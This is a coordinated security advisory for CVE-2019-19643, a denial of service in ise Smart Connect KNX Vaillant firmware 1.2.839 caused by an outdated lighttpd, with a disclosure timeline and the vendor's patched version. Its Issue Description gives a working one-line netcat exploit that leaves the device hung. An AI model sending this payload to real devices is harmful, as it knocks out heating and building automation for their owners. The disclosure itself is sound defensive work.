CVE-2019-19643 ise smart connect KNX Vaillant 1.2.839 Denial of Service

Overview

  • CVE: CVE-2019-19643
  • Author: psytester
  • Title: ise smart connect KNX Vaillant 1.2.839 Denial of Service
  • Vulnerability Type: CWE-400 Uncontrolled Resource Consumption
  • CVSSv3 Base Score: 7.5
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Publishing Date: 12.08.2020
  • Updated: –
  • Vendor: ise Individuelle Software und Elektronik GmbH
  • Product: ise Smart Connect KNX Vaillant
  • Vendor contacted: 26.11.2019
  • Vendor confirmation: 05.12.2019 with possible release date mid of 2020
  • Vendor patch: 2.0.607 since 10.08.2020
  • Vendor Reference: –
  • Affected Firmware version: 1.2.839 tested

Background

Product overview on vendor’s website.
This device connects a Vaillant heater to KNX building automation and has a TCP/IP stack for its configuration.

Issue Description

The analysis of the underlying operating system of the ise smart connect KNX Vaillant revealed that the BusyBox version v1.27.2 from 2017 with a Buildroot 2012.11.1 is installed as embedded Linux and that other outdated software packages are also used.

Just to name a few:

Buildroot: 2012.11.1
BusyBox: v1.27.2 from August 2017
Linux kernel: 3.2.20 from Jun 2012
dropbear: 2012.55
OpenSSL: 1.0.1c from May 2012
lighttpd: 1.4.31
....

After a search for already known CVE entries, the lighttpd process proved to be susceptible because of CVE-2012-5533.

This vulnerability can be exploited by unauthenticated attackers with access to the web interface:

echo -ne "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: TC,,Keep-Alive\r\n\r\n" | nc 1.2.3.4 80

After that the lighttpd is permanently in 99% CPU load and the ise smart connect KNX Vaillant does not react anymore because the resources are used up and we have a Denial of Service:

PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
  321     1 root     R     5548   2%  99% /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf

Just a restart of lighttpd process seems to be not enough to fix the overload condition, a reboot is required.

There might be much more vulnerabilities, as written in my German blog post about outdated embedded Linux Busybox/Buildroot installations.

CVE

CVE-2019-19643

CVSSv3 Base Score

CVSSv3 Base Score: 7.5

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

lighttpd fix in new ise smart connect KNX Vaillant version 2.0.607

Base software is partly updated now with

Buildroot: 2018.02
BusyBox: v1.27.2 still from from August 2017
Linux kernel: 3.2.98 from Jan 2018
dropbear: 2017.75
OpenSSL: 1.0.2n from Dec 2017
nginx: 1.12.2 is used instead of lighttpd

Credit

All researchers.
cvedetails for scanning and preparing all CVEs, separated by vendor and product.
me, but I simply scanned known CVEs to use them.

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2020 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 12, 2020